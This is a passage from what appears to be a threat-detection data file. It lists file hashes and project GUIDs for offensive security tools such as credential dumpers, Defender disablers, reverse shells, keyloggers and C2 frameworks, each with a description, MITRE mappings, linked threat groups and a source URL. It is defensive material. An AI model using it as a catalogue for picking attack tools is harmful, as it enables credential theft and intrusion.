Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","27177" "*59395105f688ef8c35cf2061928c2cb7f2f5d748518ca9ebfa5ee14a2461915e*",".{0,1000}59395105f688ef8c35cf2061928c2cb7f2f5d748518ca9ebfa5ee14a2461915e.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","27178" "*594199ae0a6e125642f438b9b09af03d2ba269259db213fdba7901b5589f2234*",".{0,1000}594199ae0a6e125642f438b9b09af03d2ba269259db213fdba7901b5589f2234.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","#filehash","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","27179" "*5943462569081cec86ed241964fbccf91b4be608c2d647470b19afe31549adc5*",".{0,1000}5943462569081cec86ed241964fbccf91b4be608c2d647470b19afe31549adc5.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","27180" "*5943c0cb2c044eb24b14969bd9b07c3c0edab83446fb9bc8188cc896f218a065*",".{0,1000}5943c0cb2c044eb24b14969bd9b07c3c0edab83446fb9bc8188cc896f218a065.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense 
Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27181" "*594811dafdfb9f5cc56b604d8fe97777c23057e37803ec34afdf5680bf9276ea*",".{0,1000}594811dafdfb9f5cc56b604d8fe97777c23057e37803ec34afdf5680bf9276ea.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","27182" "*5952e312083c8121c4856b566421aa23afe427e7f1eb0b4e6ae34515b906705a*",".{0,1000}5952e312083c8121c4856b566421aa23afe427e7f1eb0b4e6ae34515b906705a.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#filehash","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","27184" "*5953a5d8fda1ee62fad196cafa1183abf11bb5555b9b534756e98a0314411513*",".{0,1000}5953a5d8fda1ee62fad196cafa1183abf11bb5555b9b534756e98a0314411513.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","27185" "*595a77ddfb6f674bd5bc1c297ae912f5ebf6ba218a2f857ff46b7b37d1a9678b*",".{0,1000}595a77ddfb6f674bd5bc1c297ae912f5ebf6ba218a2f857ff46b7b37d1a9678b.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 
2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","27188" "*595D5812-AA30-4EDE-95DA-8EDD7B8844BD*",".{0,1000}595D5812\-AA30\-4EDE\-95DA\-8EDD7B8844BD.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#GUIDproject","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","27189" "*596481231C2187836E29D3AA4498211393C5A31FB762548D4415673CB9D21797*",".{0,1000}596481231C2187836E29D3AA4498211393C5A31FB762548D4415673CB9D21797.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","27191" "*596f3d75d96f68ee6e91c6c5ec4180b6277b6f067e6fe233193c2f75dc554e8b*",".{0,1000}596f3d75d96f68ee6e91c6c5ec4180b6277b6f067e6fe233193c2f75dc554e8b.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","27192" "*5978136ED7A5A34BD587D5D9B7E405560461B166983B94897DF0BD85434653EB*",".{0,1000}5978136ED7A5A34BD587D5D9B7E405560461B166983B94897DF0BD85434653EB.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","27193" "*597f9482c4e355cb665fbd02bde2b59133e1a364744cbb41207c68e1bd7fe3c6*",".{0,1000}597f9482c4e355cb665fbd02bde2b59133e1a364744cbb41207c68e1bd7fe3c6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27194" "*598021ca986287a82e8baa6e77bdc089d91fdfbe75da3c8dc7e105a112477eec*",".{0,1000}598021ca986287a82e8baa6e77bdc089d91fdfbe75da3c8dc7e105a112477eec.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","27195" "*59852690cccde0f1853f60abfa889899a940a43c45a4906963a52e0069b02480*",".{0,1000}59852690cccde0f1853f60abfa889899a940a43c45a4906963a52e0069b02480.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","27196" "*598555a7e053c7456ee8a06a892309386e69d473c73284de9bbc0ba73b17e70a*",".{0,1000}598555a7e053c7456ee8a06a892309386e69d473c73284de9bbc0ba73b17e70a.{0,1000}","offensive_tool_keyword","dialupass","This utility enumerates all dialup/VPN entries on your computers. and displays their logon details: User Name. Password. and Domain. 
You can use it to recover a lost password of your Internet connection or VPN.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","BlackSuit - Royal - GoGoogle","Credential Access","https://www.nirsoft.net/utils/dialupass.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","27197" "*59875ad922a551d9831d93e54c731399803a814f95a766ef920aef69441564f9*",".{0,1000}59875ad922a551d9831d93e54c731399803a814f95a766ef920aef69441564f9.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","27198" "*598f347942f32d2f22b6d95d78f3b92529f7cc6e7b6ca2fb083e118810f8c6ab*",".{0,1000}598f347942f32d2f22b6d95d78f3b92529f7cc6e7b6ca2fb083e118810f8c6ab.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27199" "*599540abb0ae7954cd087c212457c9b3d17afad00926b27bbfa8538d3d580912*",".{0,1000}599540abb0ae7954cd087c212457c9b3d17afad00926b27bbfa8538d3d580912.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","27200" 
"*599b1b33ce473c83abfbef38d7fbc7108bd694004047832559ad3d9c83857aba*",".{0,1000}599b1b33ce473c83abfbef38d7fbc7108bd694004047832559ad3d9c83857aba.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","27201" "*59a64374f430585117c385edce4ac8ff536cb2710a0037384f9f869601752af1*",".{0,1000}59a64374f430585117c385edce4ac8ff536cb2710a0037384f9f869601752af1.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","#filehash","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","27202" "*59a95d191e08984a19d6fca6b65078e372c327624605b68e9c527205eaf455e5*",".{0,1000}59a95d191e08984a19d6fca6b65078e372c327624605b68e9c527205eaf455e5.{0,1000}","offensive_tool_keyword","DRSAT","Disconnected RSAT is a launcher for the official Group Policy Manager - Certificate Authority and Certificate Templates snap-in to bypass the domain joined requirement that is needed when using the official MMC snap-in. The tool works by injecting a C# library into MMC that will hook the various API calls to trick MMC into believing that the logged on user is a domain user. 
attackers can abuse Disconnected RSAT to interact with Active Directory (AD) environments from non-domain-joined machines","T1559.001 - T1112 - T1078 - T1134.002 - T1055.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/DRSAT","1","0","#filehash","N/A","6","3","233","25","2024-12-27T11:44:18Z","2024-09-04T16:35:02Z","27203" "*59aa09cb628399ea3c2a900cb391238cea0bbe9083868f9fcfa4c13dcbf0b702*",".{0,1000}59aa09cb628399ea3c2a900cb391238cea0bbe9083868f9fcfa4c13dcbf0b702.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","27204" "*59b6bf3d2292e532ee31d4a56b4812671eb90cde840c356ac396df3e2b03fa3a*",".{0,1000}59b6bf3d2292e532ee31d4a56b4812671eb90cde840c356ac396df3e2b03fa3a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27206" "*59c03a973a4c6ad7327812d568a8bcdd9c21af006853ce459014183bef699a24*",".{0,1000}59c03a973a4c6ad7327812d568a8bcdd9c21af006853ce459014183bef699a24.{0,1000}","offensive_tool_keyword","ShellGen","PowerShell script to generate ShellCode in various formats","T1059.001 - T1588","TA0042","N/A","N/A","Resource Development","https://github.com/Leo4j/ShellGen","1","0","#filehash","N/A","7","1","41","10","2024-09-25T09:29:13Z","2024-08-22T13:32:06Z","27208" 
"*59c066aafc12f8aafd28d1b1667c5e3c8bf50ade2fa0660e18b484aeb1dd8fae*",".{0,1000}59c066aafc12f8aafd28d1b1667c5e3c8bf50ade2fa0660e18b484aeb1dd8fae.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","27209" "*59c2e7b63bbfe6dbabdd384973817bc26433c9c90ce755a9f7ec2627a949f65b*",".{0,1000}59c2e7b63bbfe6dbabdd384973817bc26433c9c90ce755a9f7ec2627a949f65b.{0,1000}","offensive_tool_keyword","VeamHax","Exploit for CVE-2023-27532 against Veeam Backup & Replication (Plaintext credential leaking tool)","T1059 - T1203 - T1040 - T1189 - T1010","TA0001 - TA0002 - TA0009 - TA0011","More_eggs","Akira - FIN6","Exploitation tool","https://github.com/sfewer-r7/CVE-2023-27532","1","0","#filehash","N/A","8","2","110","22","2023-03-23T18:03:27Z","2023-03-23T16:08:43Z","27210" "*59c75b410227497fbe9522a50dae6b52db1a222f946064d796ac10b918e5e4e6*",".{0,1000}59c75b410227497fbe9522a50dae6b52db1a222f946064d796ac10b918e5e4e6.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","#filehash","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","27211" "*59ce9c0deee4a9514bca45b542d680baa7d7b927fef94c54ac5a0433db480629*",".{0,1000}59ce9c0deee4a9514bca45b542d680baa7d7b927fef94c54ac5a0433db480629.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. 
store it in a SQL database and show you nice graphs on how your domain objects interact with each other and how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passwords/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","#filehash","N/A","5","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","27212" "*59d6b8ce447b8168f7d17f18a1584dd54c543fed2b35a5b76c49c034e20dffe2*",".{0,1000}59d6b8ce447b8168f7d17f18a1584dd54c543fed2b35a5b76c49c034e20dffe2.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK 
SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","27213" "*59e73ffcbdfd1f90f12b40c912c742837eb3e6be0333e35586db1d6de7d44d45*",".{0,1000}59e73ffcbdfd1f90f12b40c912c742837eb3e6be0333e35586db1d6de7d44d45.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27215" "*59eb20e71e9284537d2626e19a2c12a633c7568d115d939e95cfc51ee1f53c61*",".{0,1000}59eb20e71e9284537d2626e19a2c12a633c7568d115d939e95cfc51ee1f53c61.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","27216" "*59eb7b55ff7eb7ca02c78730093c973be826c5516dc32c9ffedd8682e4642264*",".{0,1000}59eb7b55ff7eb7ca02c78730093c973be826c5516dc32c9ffedd8682e4642264.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","27217" 
"*59ec5f3ac06dc1e082a3f28441105f4c65384a4360070c725452311ffc6f856b*",".{0,1000}59ec5f3ac06dc1e082a3f28441105f4c65384a4360070c725452311ffc6f856b.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","27218" "*59f031b1f9b71d2166f1b281b3ffbe40e3985d3a739d1761e59434a0032bf5c6*",".{0,1000}59f031b1f9b71d2166f1b281b3ffbe40e3985d3a739d1761e59434a0032bf5c6.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","27219" "*59fb3de646d1f2643ed4d11d87e98fa71452f8f4fd623c177f5b626f5b507c27*",".{0,1000}59fb3de646d1f2643ed4d11d87e98fa71452f8f4fd623c177f5b626f5b507c27.{0,1000}","offensive_tool_keyword","hotkeyz","Hotkey-based keylogger for Windows","T1056.001","TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/yo-yo-yo-jbo/hotkeyz","1","0","#filehash","N/A","9","1","21","1","2024-10-17T17:50:19Z","2024-06-03T21:23:16Z","27220" "*59ffa43ceae2aa7212a08e03110b3081b7d19b7e0eff508291b2a56be2f67a35*",".{0,1000}59ffa43ceae2aa7212a08e03110b3081b7d19b7e0eff508291b2a56be2f67a35.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","27221" "*59ffd99e0fe7d354d185bacf11949be89fa86a88f40ac4773f33e784279b31cd*",".{0,1000}59ffd99e0fe7d354d185bacf11949be89fa86a88f40ac4773f33e784279b31cd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27222" "*5a0976fef89e32ddcf62c790f9bb4c174a79004e627c3521604f46bf5cc7bea2*",".{0,1000}5a0976fef89e32ddcf62c790f9bb4c174a79004e627c3521604f46bf5cc7bea2.{0,1000}","offensive_tool_keyword","Invoke-WCMDump","PowerShell script to dump Windows credentials from the Credential Manager Invoke-WCMDump enumerates Windows credentials in the Credential Manager and then extracts available information about each one. Passwords are retrieved for Generic type credentials. but can not be retrieved by the same method for Domain type credentials. 
Credentials are only returned for the current user","T1003 - T1003.003 - T1003.001 - T1552","TA0006 - TA0006 - TA0006 - TA0006","N/A","N/A","Credential Access","https://github.com/peewpw/Invoke-WCMDump","1","0","#filehash","N/A","10","8","722","134","2017-12-12T00:46:33Z","2017-12-09T21:36:59Z","27224" "*5a0bd791d08f5f9871a1b2fa7f1aea81d0aeb90c7df95fe0534d3faac1847e74*",".{0,1000}5a0bd791d08f5f9871a1b2fa7f1aea81d0aeb90c7df95fe0534d3faac1847e74.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","#filehash","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","27225" "*5a0c1ccb6b02b2bfa1d84be0b8055274b884f0d58447b5b3eaf19d9c5197c19e*",".{0,1000}5a0c1ccb6b02b2bfa1d84be0b8055274b884f0d58447b5b3eaf19d9c5197c19e.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","27226" "*5A0FBE0D-BACC-4B97-8578-B5B27567EEA7*",".{0,1000}5A0FBE0D\-BACC\-4B97\-8578\-B5B27567EEA7.{0,1000}","offensive_tool_keyword","MutationGate","MutationGate is a new approach to bypass EDR's inline hooking by utilizing hardware breakpoint to redirect the syscall.","T1055.011 - T1564.008 - T1557","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/MutationGate","1","0","#GUIDproject","N/A","8","3","251","34","2024-04-10T03:12:58Z","2024-01-15T04:29:37Z","27228" "*5a145c3bcbe90fdd067206d68009d5ba36f8d0bea8f1d6bcbf0a0f05005edf38*",".{0,1000}5a145c3bcbe90fdd067206d68009d5ba36f8d0bea8f1d6bcbf0a0f05005edf38.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - 
T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","27229" "*5a1a2900ec634bb1651fff9d542491221449754289ad5a58791ee3104ccef752*",".{0,1000}5a1a2900ec634bb1651fff9d542491221449754289ad5a58791ee3104ccef752.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27232" "*5a1f9b0e-9f7c-4673-bf16-4740707f41b7*",".{0,1000}5a1f9b0e\-9f7c\-4673\-bf16\-4740707f41b7.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","#GUIDproject","N/A","10","7","630","150","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z","27233" "*5a21e58cf302bd2ff1cd95bceaaae6f22151ac15af52ea1249b2e0ddfffe704f*",".{0,1000}5a21e58cf302bd2ff1cd95bceaaae6f22151ac15af52ea1249b2e0ddfffe704f.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - 